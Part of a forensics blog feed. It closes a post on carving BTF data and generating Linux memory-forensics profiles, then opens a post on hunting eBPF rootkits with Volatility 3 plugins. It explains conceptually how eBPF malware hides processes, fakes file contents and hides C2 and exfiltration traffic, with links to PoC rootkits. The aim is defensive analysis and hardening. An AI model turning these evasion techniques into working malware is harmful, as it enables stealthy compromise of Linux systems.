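<p>The magic-byte scan is simple enough to sketch here. Assuming the documented BTF header layout (16-bit magic <code class="language-plaintext highlighter-rouge">0xeb9f</code>, 8-bit version, 8-bit flags, 32-bit header length of 24), a first-pass carver could look like this; the heuristics are illustrative and a real tool would validate more of the header:</p>

```python
import struct

# Scan a raw image for the BTF magic and sanity-check the header fields
# that follow it (magic, version, flags, hdr_len per the BTF header layout).
BTF_MAGIC = 0xEB9F

def find_btf_candidates(image: bytes):
    needle = struct.pack("<H", BTF_MAGIC)  # magic is stored little-endian
    pos = image.find(needle)
    while pos != -1:
        if pos + 8 <= len(image):
            magic, version, flags, hdr_len = struct.unpack_from("<HBBI", image, pos)
            # Heuristics: current BTF version is 1, header length is 24 bytes.
            if version == 1 and hdr_len == 24:
                yield pos
        pos = image.find(needle, pos + 1)

# Tiny synthetic "image" with one valid-looking header at offset 64.
blob = b"\x00" * 64 + struct.pack("<HBBI", BTF_MAGIC, 1, 0, 24) + b"\x00" * 64
print(list(find_btf_candidates(blob)))  # offsets of plausible BTF headers
```

<p>False positives are cheap to discard later by attempting to actually parse the type and string sections at the candidate offset.</p>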

<p><em>Note</em>: <code class="language-plaintext highlighter-rouge">kallsyms</code> in memory may contain addresses with the ASLR offset applied, while the <code class="language-plaintext highlighter-rouge">System.map</code> assumes an ASLR slide of zero. One would either need to find a way to adjust them or teach Volatility to work with “real” addresses, which would tie the profile to a particular image. I have a rough idea how to do the former: scan for swapper as usual, transition to its root page tables via symbol information, reconstruct the page tables, and read off the slide of the kernel region.</p>
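<p>The arithmetic for the adjustment itself is trivial; the hard part is obtaining one trustworthy runtime address. A sketch with made-up addresses:</p>

```python
# Once one symbol's runtime (ASLR-shifted) address is known, the slide is
# its distance from the unslid System.map address, and every other address
# can be normalized with it. Addresses below are made up for illustration.
def kaslr_slide(runtime_addr: int, system_map_addr: int) -> int:
    return runtime_addr - system_map_addr

def unslide(addr: int, slide: int) -> int:
    return addr - slide

slide = kaslr_slide(0xFFFFFFFFA2A11940, 0xFFFFFFFF82A11940)
print(hex(slide))  # 0x20000000
print(hex(unslide(0xFFFFFFFFA2C00000, slide)))
```
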

<p><em>Note:</em> This obviously only works for kernels compiled with <code class="language-plaintext highlighter-rouge">CONFIG_KALLSYMS=y</code>.</p>

<h3 id="evaluating-the-symdb-approach">Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> Approach</h3>

<p>Currently, everything around the <code class="language-plaintext highlighter-rouge">symdb</code> amounts to me eyeballing, based on my (limited) experience and our small-scale evaluation, that “this stuff should probably work”. Anyway, we need to actually implement and evaluate this for real!</p>

<ul>
  <li><strong>Building and automatically maintaining the <code class="language-plaintext highlighter-rouge">symdb</code> as it was described above</strong> (conceptually difficult, lots of work). For this we need at the very least the preprocessed C code but working with LLVM IR would be a lot nicer. Then, the extraction of type names for all global symbols is possible for the C code and easy for the LLVM IR. One issue I already see is that to get the preprocessed C code one needs to make choices for all configuration options, and the set of symbols depends on those options - some sort of compromise will be needed here.</li>
  <li><strong>Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> and its underlying assumptions</strong> (conceptually simple, medium work). By using DWARF as ground truth, it should be rather straightforward to evaluate the correctness of the <code class="language-plaintext highlighter-rouge">symdb</code> mapping.</li>
</ul>
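<p>The evaluation step is mostly bookkeeping. A sketch of the comparison against DWARF ground truth, with made-up sample data:</p>

```python
# Treat a DWARF-derived (symbol -> type) mapping as ground truth and
# score a symdb against it: accuracy over shared symbols, plus lists of
# wrong and missing entries. Sample data is illustrative.
def evaluate_symdb(symdb: dict, dwarf_truth: dict):
    checked = {name: t for name, t in symdb.items() if name in dwarf_truth}
    correct = sum(1 for name, t in checked.items() if dwarf_truth[name] == t)
    return {
        "accuracy": correct / len(checked) if checked else 0.0,
        "wrong": sorted(n for n, t in checked.items() if dwarf_truth[n] != t),
        "missing": sorted(set(dwarf_truth) - set(symdb)),
    }

truth = {"init_task": "task_struct", "modules": "list_head", "prb": "printk_ringbuffer"}
symdb = {"init_task": "task_struct", "modules": "list_head"}
print(evaluate_symdb(symdb, truth))
```

<p>Run across many kernels, this would directly test the stability assumptions behind the <code class="language-plaintext highlighter-rouge">symdb</code> approach.</p>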

<p>That’s it, thanks for reading!</p>

<h2 id="appendix-a-accessed-symbols">Appendix A: Accessed Symbols</h2>

<p>List of all symbols whose type is queried when running all Volatility3 analysis plugins. This data was generated by instrumenting the <code class="language-plaintext highlighter-rouge">get_type</code> method of the <code class="language-plaintext highlighter-rouge">SymbolInterface</code>.</p>

<p><em>Note</em>: We excluded <code class="language-plaintext highlighter-rouge">linux.check_syscall.CheckSyscall</code> as this plugin iterates over (all) symbols and calls <code class="language-plaintext highlighter-rouge">get_symbol</code>, which accesses the type for caching purposes. However, it does not use the type information.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__sched_class_highest
__sched_class_lowest
_etext
_text
cap_last_cap
dl_sched_class
fair_sched_class
idle_sched_class
idt_table
init_files
init_mm
init_pid_ns
init_task
iomem_resource
keyboard_notifier_list
mod_tree
module_kset
modules
net_namespace_list
prb
prog_idr
rt_sched_class
socket_file_ops
sockfs_dentry_operations
stop_sched_class
tcp4_seq_afinfo
tcp6_seq_afinfo
tty_drivers
udp4_seq_afinfo
udp6_seq_afinfo
udplite4_seq_afinfo
udplite6_seq_afinfo
</code></pre></div></div>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>Not to mention all the self-compiled kernels that do not have publicly available binary packages at all. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>Sorry Windows users, no pre-compiled binaries for you – WSL for the win! <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>Alternatively, a portable program can make use of <a href="https://gcc.gnu.org/onlinedocs/gcc/BPF-Built-in-Functions.html">compiler built-ins</a> that can be combined to achieve the same effect, but allow it to do even crazier things, like testing whether a field of an enum exists. I recommend reading <a href="https://nakryiko.com/posts/bpf-core-reference-guide/">this post</a> if you are interested in learning more about the mechanics of portable programs. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[This post is about some work that I did on automatic profile generation for memory forensics of Linux systems. To be upfront about it: This work is somewhat half-finished – it already does something quite useful, but it could do a lot more, and it has not been evaluated thoroughly enough to be considered “production ready”. The reason I decided to publish it anyway is that I believe that there is an interesting opportunity to change the way in which we generate profiles for the analysis of Linux memory images in practice. However, in order for it to become a production tool, at least one outstanding problem has to be addressed (I have some ideas on that one) and lots of coding work needs to be done – and I simply do not have the resources to work on that right now.]]></summary></entry><entry><title type="html">BPF Memory Forensics with Volatility 3</title><link href="https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3.html" rel="alternate" type="text/html" title="BPF Memory Forensics with Volatility 3" /><published>2023-12-21T00:00:00+00:00</published><updated>2023-12-21T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3</id><content type="html" xml:base="https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3.html"><![CDATA[<p>Have you ever wondered what an eBPF rootkit looks like? Well, here’s one, have a good look:</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/ubuntu-20.04-LTS-focal-ebpfkit.png" alt="ubuntu-20.04-LTS-focal-ebpfkit.png" /></p>

<p>Upon receiving a command and control (C2) request, this specimen can execute arbitrary commands on the infected machine, exfiltrate sensitive files, perform passive and active network discovery scans (like <code class="language-plaintext highlighter-rouge">nmap</code>), or provide a privilege escalation backdoor to a local shell. Of course, it’s also trying its best to hide itself from system administrators hunting it with command line tools such as <code class="language-plaintext highlighter-rouge">ps</code>, <code class="language-plaintext highlighter-rouge">lsof</code>, or <code class="language-plaintext highlighter-rouge">tcpdump</code>, and even from dedicated tools like <code class="language-plaintext highlighter-rouge">rkhunter</code> or <code class="language-plaintext highlighter-rouge">chkrootkit</code>.</p>

<p>Well, you say, rootkits have been doing that for more than 20 years now, so what’s the news here? The news is not so much the features themselves, but rather how they are implemented: everything is realized using a relatively new and rapidly evolving kernel feature, eBPF. Even though it has been in the kernel for almost 10 years now, we’re regularly surprised by how many experienced Linux professionals are still unaware of its existence, not to mention its potential for abuse.</p>

<p>The above picture was generated from the memory image of a system infected with <a href="https://github.com/Gui774ume/ebpfkit"><code class="language-plaintext highlighter-rouge">ebpfkit</code></a>, an open-source PoC rootkit from 2021, using a plugin for the <a href="https://github.com/volatilityfoundation/volatility3">Volatility 3</a> memory forensics framework. In this blog post, we will present a total of seven plugins that, taken together, facilitate an in-depth analysis of the state of the BPF subsystem.</p>

<p>We structured this post as follows: The next section provides an introduction to the BPF subsystem, while the third section highlights its potential for (ab)use by malware. In section four, we will introduce seven Volatility 3 plugins that facilitate the examination of BPF malware. Section five presents a case study, followed by a section describing our testing and evaluation of the plugins on various Linux distributions.
In the last section, we conclude with a discussion of the steps that are necessary to integrate our work into the upstream Volatility project, other challenges we encountered, and open research questions.</p>

<p><em>Note: The words “eBPF” and “BPF” will be used interchangeably throughout this post.</em></p>

<h2 id="the-bpf-subsystem">The BPF Subsystem</h2>

<p>Before delving into the complexities of memory forensics, it is necessary to establish some basics about the BPF subsystem. Readers that are already familiar with the topic can safely skip this section.</p>

<p>To us, BPF is first of all an <strong>instruction set architecture (ISA)</strong>. It has ten general purpose registers, which are 64 bit wide, and there are all of the basic operations that you would expect a modern ISA to have. Its creator, Alexei Starovoitov, once described it as a kind of simplified x86-64 and would probably never have imagined that the ISA he cooked up back in 2014 would once enter a standardization process at the IETF. The interested reader can find the current proposed standard <a href="https://datatracker.ietf.org/doc/draft-ietf-bpf-isa/">here</a>. Of course, there are all the other things that you would expect to come with an ISA, like an ABI that defines the calling convention, and a binary encoding that maps instructions to sequences of four or eight bytes.</p>
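<p>To illustrate the binary encoding: a basic BPF instruction is eight bytes, consisting of an opcode byte, a byte holding the destination and source register nibbles, a signed 16-bit offset, and a signed 32-bit immediate. A small decoder, useful as a starting point when dissecting program bytecode from memory:</p>

```python
import struct

# Decode one 8-byte BPF instruction: opcode, dst/src register nibbles,
# signed 16-bit offset, signed 32-bit immediate (all little-endian).
def decode_insn(raw: bytes):
    code, regs, off, imm = struct.unpack("<BBhi", raw[:8])
    return {
        "opcode": code,
        "dst_reg": regs & 0x0F,  # low nibble (little-endian layout)
        "src_reg": regs >> 4,    # high nibble
        "offset": off,
        "imm": imm,
    }

# 0xb7 is BPF_ALU64|BPF_MOV|BPF_K, i.e. "mov r0, 42"; 0x95 is BPF_EXIT.
prog = struct.pack("<BBhi", 0xB7, 0x00, 0, 42) + struct.pack("<BBhi", 0x95, 0, 0, 0)
print(decode_insn(prog[:8]))
```

<p>Wide instructions (64-bit immediate loads) occupy two such slots, which a full disassembler has to account for.</p>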

<p>The BPF ISA is used as a compilation target (currently by clang - gcc support is on the way) for programs written in high-level languages (currently C and Rust), however, it is not meant to be implemented in hardware. Therefore, it is conceptually more similar to WebAssembly or Java Bytecode than x86-64 or arm64, i.e., BPF programs are meant to be executed by a <strong>runtime</strong> that implements the BPF virtual machine (VM). Several BPF runtimes exist, but the “reference implementation” is in the Linux kernel.</p>

<p>Runtimes are, of course, free to choose how they implement the BPF VM. The instruction set was defined in a way that makes it easy to implement a one-to-one just in time (JIT) compiler for many CPU architectures. In fact, in the Linux kernel, even non-mainstream architectures like powerpc, sparc or s390 have BPF JITs. However, the kernel also has an <a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/core.c#L1648">interpreter</a> to run BPF programs on architectures that do not yet support JIT compilation.</p>

<p>Aside: <em>The BPF platform is what some call a “<strong>verified</strong> target”. This means that in order for a program to be valid it has to have some “non-local” properties. Those include: the absence of (unbounded) loops; that registers and memory can only be read after they have been written to; that the stack depth may not exceed a hard limit; and many more. The interested reader can find a more exhaustive description <a href="https://www.kernel.org/doc/html/latest/bpf/verifier.html">here</a>. In practice, runtime implementations include an up-front static verification stage and refuse to execute programs that cannot be proven to meet these requirements (some runtime checks may be inserted to account for the known shortcomings of static analysis). This static verification approach is at the heart of BPF’s sandboxing model for untrusted code.</em></p>

<p>Roughly speaking, the BPF subsystem includes, besides the implementation of the BPF VM, a user and kernel space interface for managing the program life cycle as well as infrastructure for transitioning the kernel control flow in and out of programs running inside the VM. Other subsystems can be made “programmable” by integrating the BPF VM in places where they want to allow the calling of user-defined functions, e.g., for decision making based on their return value. The networking subsystem, for example, supports handing all incoming and outgoing packets on an interface to a BPF program. Those programs can freely rewrite the packet buffer or even decide to drop the packet all together. Another example is the tracing subsystem that supports transitioning control into BPF programs at essentially any instruction via one of the various ways it has to hook into the kernel and user space execution. The final example here is the Linux Security Module (LSM) subsystem that supports calling out to BPF programs at any of its security hooks placed at handpicked choke points in the kernel. There are many more examples of BPF usage in the kernel and even more in <a href="https://dl.acm.org/doi/proceedings/10.1145/3609021">academic research papers</a> and patches on the mailing list, but we guess we conveyed the general idea.</p>

<p>BPF programs can interact with the world outside of the VM via so-called <strong>helpers</strong> or <strong>kfuncs</strong>, i.e., native kernel functions that can be called by BPF programs. Services provided by these functions range from getting a timestamp to sending a signal to the current task or reading arbitrary memory. Which functions a program can call depends on the <em>program type</em> that was selected when loading it into the VM. When reversing BPF programs, looking for calls to interesting kernel functions is a good place to start.</p>

<p>The second ingredient you need in order to get any real work done with a BPF program is <strong>maps</strong>. While programs can store data during their execution using stack memory or by allocating objects on the heap, the only way to persist data across executions of the same program is via maps. Maps are mutable, persistent key-value stores that can be accessed by BPF programs and user space alike; as such, they can be used for user-to-BPF, BPF-to-user, or BPF-to-BPF communication, where in the last case the communicating programs may be different or the same program at different times.</p>

<p>Another relevant aspect of the BPF ecosystem is the promise of <strong>compile once run everywhere (CORE)</strong>, i.e., a (compiled) BPF program can be run inside of a wide range of Linux kernels that might have different configurations, versions, compilers, and even CPU architectures. This is achieved by having the compiler emit special relocation entries that are processed by a user-space loader prior to loading a program into the kernel’s BPF VM. The key ingredient that enables this approach is a self-description of the running kernel in the form of BPF Type Format (BTF) information, which is made available in special files under <code class="language-plaintext highlighter-rouge">/sys/kernel/btf/</code>. For example, BPF source code might do something like <code class="language-plaintext highlighter-rouge">current-&gt;comm</code> to access the name of the process in whose context the program is running. This might generate an assembly instruction that adds the offset of the <code class="language-plaintext highlighter-rouge">comm</code> field to a pointer to the task descriptor that is stored in a register, i.e., <code class="language-plaintext highlighter-rouge">ADD R5, IMM</code>. However, the immediate offset might vary due to kernel version, configuration, structure layout randomization or CPU architecture. Thus, the compiler would emit a relocation entry that tells the user-space loader running on the target system to check the kernel’s BTF information in order to overwrite the placeholder with the correct offset. Together with other kinds of relocations, which address things like the existence of types and enum variants or their sizes, the loader can be used to run the same BPF program on a considerable number of kernels.</p>
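<p>A toy illustration of that final patching step (this is not libbpf’s actual implementation, just the arithmetic it boils down to): the loader locates the placeholder instruction and overwrites its immediate with the field offset read from the target kernel’s BTF.</p>

```python
import struct

# Overwrite the 32-bit immediate of the instruction at insn_idx with the
# field offset obtained from the target kernel's BTF. Each basic BPF
# instruction is 8 bytes; the immediate is its last 4 bytes.
def apply_field_offset_reloc(prog: bytearray, insn_idx: int, real_offset: int):
    imm_pos = insn_idx * 8 + 4
    struct.pack_into("<i", prog, imm_pos, real_offset)

# One placeholder instruction (0x07 = BPF_ALU64|BPF_ADD|BPF_K on r5);
# pretend the target kernel's BTF says comm lives at offset 0xBC0.
prog = bytearray(struct.pack("<BBhi", 0x07, 0x05, 0, 0))
apply_field_offset_reloc(prog, 0, 0xBC0)
print(struct.unpack_from("<i", prog, 4)[0])  # the patched immediate
```
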

<p>Aside: <em>A problem with the CORE implementation described above is that signatures over BPF programs are meaningless as the program text will be altered by relocations before loading. To allow for a meaningful ahead of time signature there is another approach in which a loader program is generated for the actual program. The loader program is portable without relocations and is signed and loaded together with the un-relocated bytecode of the actual program. Thus, the problem is solved as all text relocations happen in the kernel, i.e., after signatures have been verified.</em></p>

<p>However, there are of course limits to the portability of BPF programs. As we all know, the kernel takes great care to never break user space, within kernel land, on the other hand, there are no stability guarantees at all. BPF programs are not considered to be part of user space and thus there are no forward or backward compatibility guarantees. In practice, that means that APIs exposed to BPF could be removed or changed, attachment points could vanish or change their signature, or programs that are currently accepted by the static verifier could be rejected in the future. Furthermore, changes in kernel configuration could remove structure fields, functions, or kernel APIs that programs rely on. In that sense, BPF programs are in a position similar to out-of-tree kernel modules. That being said, due to CORE, there is no need to have the headers of the target kernel available at compile time and thus a lot less knowledge about the target is needed to be confident that the program will be able to run successfully. Furthermore, in the worst case the program will be rejected by the kernel, but there are no negative implications on system stability by attempting to load it.</p>

<p>Finally, we should mention that BPF is an entirely privileged interface. There are multiple BPF-related <a href="https://elixir.bootlin.com/linux/v6.1.68/source/include/uapi/linux/capability.h#L411">capabilities</a> that a process can have, which open up various parts of the subsystem. This has not always been the case. A few years ago, unprivileged users were able to load certain types of BPF programs, however, access to the BPF VM comes with two potential security problems. First, the security entirely relies on the correctness of the static verification stage, which is notoriously complex and must keep up with the ever-expanding feature set. It has been demonstrated that errors in the verification process can be exploited for local privilege escalation, e.g., <a href="https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification">CVE-2020-8835</a> or <a href="https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story">CVE-2021-3490</a>. Second, even within the boundaries set by the verifier, the far-reaching control over the CPU instructions that get executed in kernel mode opens up the door for Spectre attacks, c.f., <a href="https://github.com/hamishcoleman/spectre-tests/blob/master/project-zero/writeup_files/WRITEUP#L282">Jann Horn’s writeup</a> or the original <a href="https://spectreattack.com/spectre.pdf">Spectre paper</a>. For those reasons, the kernel community has decided to remove unprivileged access to BPF <a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L71">by default</a>.</p>

<h2 id="bpf-malware">BPF Malware</h2>

<p>To better understand the implications the addition of the BPF VM has for the Linux malware landscape, we would like to start with a quote from “BPF inventor” Alexei Starovoitov: “If in the past the whole kernel would maybe be [a] hundred of programmers across the world, now a hundred thousand people around the world can program the kernel thanks to BPF.”, i.e., BPF significantly lowers the entry barrier to kernel programming and shipping applications that include kernel-level code. While the majority of new kernel programmers are well-intentioned and aim to develop innovative and useful applications, experience has shown that there will be some actors who seek to use new kernel features for malicious purposes.</p>

<p>From a malware author’s perspective, one of the first questions is probably how likely it is that a target system will support the loading of malicious BPF programs. According to our personal experience it is safe to say that most general-purpose desktop and server distributions enable BPF. The feature is also enabled in the <code class="language-plaintext highlighter-rouge">android-base.config</code> as BPF plays a significant role in the Android OS, i.e., essentially every Android device should support BPF - from your fridge to your phone. Concerning the custom kernels used by big tech companies let me quote Brendan Gregg, another early BPF advocate: “As companies use more and more eBPF also, it becomes harder for your operating system to not have eBPF because you are no longer eligible to run workloads at Netflix or at Meta or at other companies.”. What is more, Google relies on BPF (through <a href="https://github.com/cilium/cilium"><code class="language-plaintext highlighter-rouge">cilium</code></a>) in its Kubernetes engine and Facebook uses it for its layer 4 load balancer <a href="https://github.com/facebookincubator/katran"><code class="language-plaintext highlighter-rouge">katran</code></a>. For a more comprehensive survey of BPF usage in cloud environments we recommend section 5 of <a href="https://www.usenix.org/conference/usenixsecurity23/presentation/he"><em>Cross Container Attacks: The Bewildered eBPF on Clouds</em></a> by Yi He et al. Thus, most of the machines that constitute “the cloud” are likely to support BPF. This is particularly interesting as signature verification for BPF programs is still not available, making it the only way to run kernel code on locked-down systems that restrict the use of kernel modules.</p>

<p>However, enabling the BPF subsystem, i.e., <code class="language-plaintext highlighter-rouge">CONFIG_BPF</code>, is only the beginning of the story. There are many compile-time or run-time configuration choices that affect the capabilities granted to BPF programs, and thus the ways in which they can be used to subvert the security of a system. Giving a full overview of all the available switches and their effect would exceed the scope of this post, however, we will mention some knobs that can be turned to stop the abuses mentioned below.</p>

<p>If you search for the term “BPF malware” these days, you will find rather sensational articles with titles like “eBPF: A new frontier for malware”, “How BPF-Enabled Malware Works”, “eBPF Offensive Capabilities – Get Ready for Next-gen Malware”, “Nothing is Safe Anymore - Beware of the “eBPF Trojan Horse” or “HOW DOES EBPF MALWARE PERFORM AGAINST STAR LAB’S KEVLAR EMBEDDED SECURITY?”. Needless to say, they contain hardly any useful information. The truth is that we are not aware of any reports of in-the-wild malware using BPF. Nevertheless, there is no shortage of open-source PoC BPF malware on GitHub. The two biggest projects are probably <a href="https://github.com/Gui774ume/ebpfkit">ebpfkit</a> and <a href="https://github.com/h3xduck/TripleCross">TripleCross</a>; however, there are many smaller projects like <a href="https://github.com/eeriedusk/nysm">nysm</a>, <a href="https://github.com/Esonhugh/sshd_backdoor">sshd_backdoor</a>, <a href="https://github.com/krisnova/boopkit">boopkit</a>, <a href="https://github.com/citronneur/pamspy">pamspy</a>, or <a href="https://github.com/pathtofile/bad-bpf">bad bpf</a> as well as snippet collections like <a href="https://github.com/nccgroup/ebpf">nccgroup’s bpf tools</a> and <a href="https://github.com/wunderwuzzi23/Offensive-BPF">Offensive-BPF</a>. Researchers also used malicious BPF programs to <a href="https://www.usenix.org/conference/usenixsecurity23/presentation/he">escape container isolation</a> in multiple real-world cloud environments.</p>

<p>There are a couple of core shenanigans that those malwares are constructed around, three of which we will briefly describe here.</p>

<p>It is possible to transparently (for user space) skip the execution of any system call or to manipulate just the return value after it was executed. This is possible because BPF can be used for the purpose of <a href="https://lwn.net/Articles/740146/">error injection</a>. To be precise, any function that is annotated with the <code class="language-plaintext highlighter-rouge">ALLOW_ERROR_INJECTION</code> macro can be manipulated in this way, and every system call is <a href="https://elixir.bootlin.com/linux/v6.1.64/source/arch/x86/include/asm/syscall_wrapper.h#L74">automatically annotated</a> via the macro that defines it. One would hope that the corresponding configurations <a href="https://elixir.bootlin.com/linux/v6.1.64/source/kernel/trace/Kconfig#L711"><code class="language-plaintext highlighter-rouge">BPF_KPROBE_OVERRIDE</code></a> and <a href="https://elixir.bootlin.com/linux/v6.1.67/source/lib/Kconfig.debug#L1880"><code class="language-plaintext highlighter-rouge">CONFIG_FUNCTION_ERROR_INJECTION</code></a> would not be enabled in kernels shipped to end users, but they are. There are many things that one can do by lying to user space in this way; one example is to block the sending of all signals to a specific process, e.g., to protect it from being <a href="https://github.com/Gui774ume/ebpfkit/blob/5727985eab7eca7255ca5cb7c74133c0074e3324/ebpf/ebpfkit/signal.h#L18">killed</a>. Interestingly, the same helper is also used by BPF-based security solutions like <a href="https://github.com/cilium/tetragon/blob/d8f5d44810ad2079ee408175454aab5c1159f09e/docs/content/en/docs/concepts/tracing-policy/selectors.md?plain=1#L1030">tetragon</a>, which are deployed in production cloud environments.</p>

<p>Another common primitive is to write to memory of the current process, which gives attackers the power to perform all sorts of interesting memory corruptions. One of the more original ideas is to <a href="https://github.com/nccgroup/ebpf/tree/master/glibcpwn">inject code</a> into a process by writing a ROP chain onto its stack. The chain sets up everything to load a shared library and cleanly resumes the process afterwards. More generally, the helper <code class="language-plaintext highlighter-rouge">bpf_probe_write_user</code> is involved in many techniques to hide objects, e.g., sockets or BPF programs, from user space or when manipulating apparent file and directory contents, e.g., <code class="language-plaintext highlighter-rouge">/proc</code>, <code class="language-plaintext highlighter-rouge">/etc/sudoers</code> or <code class="language-plaintext highlighter-rouge">~/.ssh/authorized_keys</code>. In particular, those apparent modifications cannot be caught with file system forensics as they are only happening in the memory of the process that attempts to access the resource, e.g., see <a href="https://github.com/pathtofile/bad-bpf/blob/main/src/textreplace.bpf.c"><code class="language-plaintext highlighter-rouge">textreplace</code></a> for an example that allows arbitrary apparent modifications of file contents. While there are in fact a couple of legitimate programs (like the <a href="https://github.com/DataDog/datadog-agent/blob/f425dfa882dd9ca8533172c246ea047be1a40799/pkg/security/ebpf/probes/all.go#L257">Datadog-agent</a>) using this function, it is probably wise to enable <a href="https://elixir.bootlin.com/linux/v6.1.67/source/security/lockdown/Kconfig#L33"><code class="language-plaintext highlighter-rouge">CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY</code></a> before compilation.</p>

<p>A rather peculiar aspect of BPF malware is how it communicates over the network. BPF programs are not able to initiate network connections by themselves, but as one of the main applications of BPF is in the networking subsystem, they have far-reaching capabilities when it comes to managing existing traffic. For example, XDP programs get their hands on packets very early in the receive path, long before mechanisms like netfilter, which is much further up the network stack, get a chance to see them. In fact, there are high-end NICs that support <a href="https://www.netronome.com/blog/ever-deeper-bpf-update-hardware-offload-support/">running BPF programs on the device’s processor</a> rather than the host CPU. Furthermore, programs that handle packets can usually modify, reroute, or drop them. In combination, this is often used to receive C2 commands while at the same time hiding the corresponding packets from the rest of the kernel by modifying or dropping them. In addition, BPF’s easy programmability makes it simple to implement complex, stateful triggers. To exfiltrate data from the system, the contents, and potentially also the recipient data, of outgoing packets are modified, for example by traffic control (tc) hooks. For unreliable transport protocols, higher layers will deal with the induced packet loss, while for TCP the retransmission mechanism ensures that applications will not be impacted. Turn off <a href="https://www.kernelconfig.io/CONFIG_NET_CLS_BPF?q=NET_CLS_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">CONFIG_NET_CLS_BPF</code></a> and <a href="https://www.kernelconfig.io/CONFIG_NET_ACT_BPF?q=CONFIG_NET_ACT_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">CONFIG_NET_ACT_BPF</code></a> to disable tc BPF programs.</p>

<p>While the currently charted BPF malware landscape is limited to hobby projects by security researchers and other interested individuals, it would unfortunately not be unheard of for these very projects to eventually be discovered during real-world incidents. Advanced Linux malware, on the other hand, will most likely choose to implement its own BPF programs when this is believed to be beneficial for its cause, for instance to avoid detection by using a mechanism that is not yet well known to the forensic community. Some excerpts from the recent <a href="https://www.youtube.com/watch?v=0BDB53PqcoU">talk by Kris Nova at DevOpsDays Kyiv</a> give an interesting insight into the concerns that the Ukrainian computer security community had, and still has, regarding the use of BPF in Russian attacks on their systems.</p>

<p>It would be dishonest to claim that there is a general scheme that you can follow while analyzing an incident to discover all malicious BPF programs. As so often, the boundaries between monitoring software, live patches, security solutions and malware are not clearly defined, e.g., in addition to <code class="language-plaintext highlighter-rouge">bpf_override_return</code> <a href="https://github.com/cilium/tetragon">tetragon</a> also uses <code class="language-plaintext highlighter-rouge">bpf_send_signal</code>. The first step could be to obtain a baseline of expected BPF-related activity, and carefully analyze any deviations or anomalies. Additionally, a look at the kernel configuration can help to decide which kinds of malicious activity are fundamentally possible. Furthermore, programs that make use of possibly malicious helper functions, like <code class="language-plaintext highlighter-rouge">bpf_probe_write_user</code>, <code class="language-plaintext highlighter-rouge">bpf_send_signal</code>, <code class="language-plaintext highlighter-rouge">bpf_override_return</code>, or <code class="language-plaintext highlighter-rouge">bpf_skb_store_bytes</code> should be <a href="https://blogs.blackberry.com/en/2021/12/reverse-engineering-ebpfkit-rootkit-with-blackberrys-free-ida-processor-tool">reverse engineered</a> with particular scrutiny. In addition, there are some clear indicators of malicious activity, like the hiding of programs, which we will discuss in more detail below. Finally, once program signatures are upstreamed, it is highly recommended to enable and enforce them to lock down this attack surface.</p>

<p>From now on, we will shift gears and focus on the main topic of this post, hunting BPF malware in main memory images.</p>

<p><em>Aside: The <a href="https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/">bvp47</a>, <a href="https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat">Symbiote</a> and <a href="https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/">BPFdoor</a> rootkits are often said to be examples of BPF malware. However, they are using only what is now known as classic BPF, i.e., the old-school packet filtering programs used by programs like tcpdump.</em></p>

<h2 id="volatility-plugins">Volatility Plugins</h2>

<p>Volatility is a <strong>memory forensics framework</strong> that can be used to analyze physical memory images. It uses information about symbols and types of the operating system that was running on the imaged system to recover high-level information, like the list of running processes or open files, from the raw memory image.</p>

<p>Individual analyses are implemented as <strong>plugins</strong> that make use of the framework library as well as other plugins. Some of those plugins are closely modeled after core unix utilities, like the <code class="language-plaintext highlighter-rouge">ps</code> utility for listing processes, the <code class="language-plaintext highlighter-rouge">ss</code> utility for listing network connections or the <code class="language-plaintext highlighter-rouge">lsmod</code> utility for listing kernel modules. Other plugins implement checks that search for common traces of kernel rootkit activity, like the replacement of function pointers or inline hooks.</p>

<p>There may be multiple ways to obtain the same piece of information, and thus multiple plugins that, on first sight, serve the same purpose. <strong>Inconsistencies</strong> between the methods, however, could indicate malicious activity that tries to hide its presence or just be artifacts of imperfections in the acquisition process. In any case, inconsistencies are something an investigator should look into.</p>

<p>In this section we present seven Volatility plugins that we have developed to enable analysis of the BPF subsystem. Three of these are modeled after subcommands of the <a href="https://github.com/libbpf/bpftool"><code class="language-plaintext highlighter-rouge">bpftool</code></a> utility and provide basic functionality. We then present three plugins that retrieve similar information from other sources and can thus be used to detect inconsistencies. Finally, we present a plugin that aggregates information from four other plugins to make it easier to interpret.</p>

<p><em>Note: We published the source code for all of our plugins on <a href="https://github.com/vobst/BPFVol3">GitHub</a>. We would love to see your contributions there! :)</em></p>

<h3 id="listing-programs-maps--links">Listing Programs, Maps &amp; Links</h3>

<p>Arguably the most basic task you could think of is simply listing the programs that have been loaded into the BPF VM. We will start by doing this on a live system; feel free to follow along to discover what your distribution, or additional packages you installed, has already loaded.</p>

<h4 id="live-system">Live System</h4>

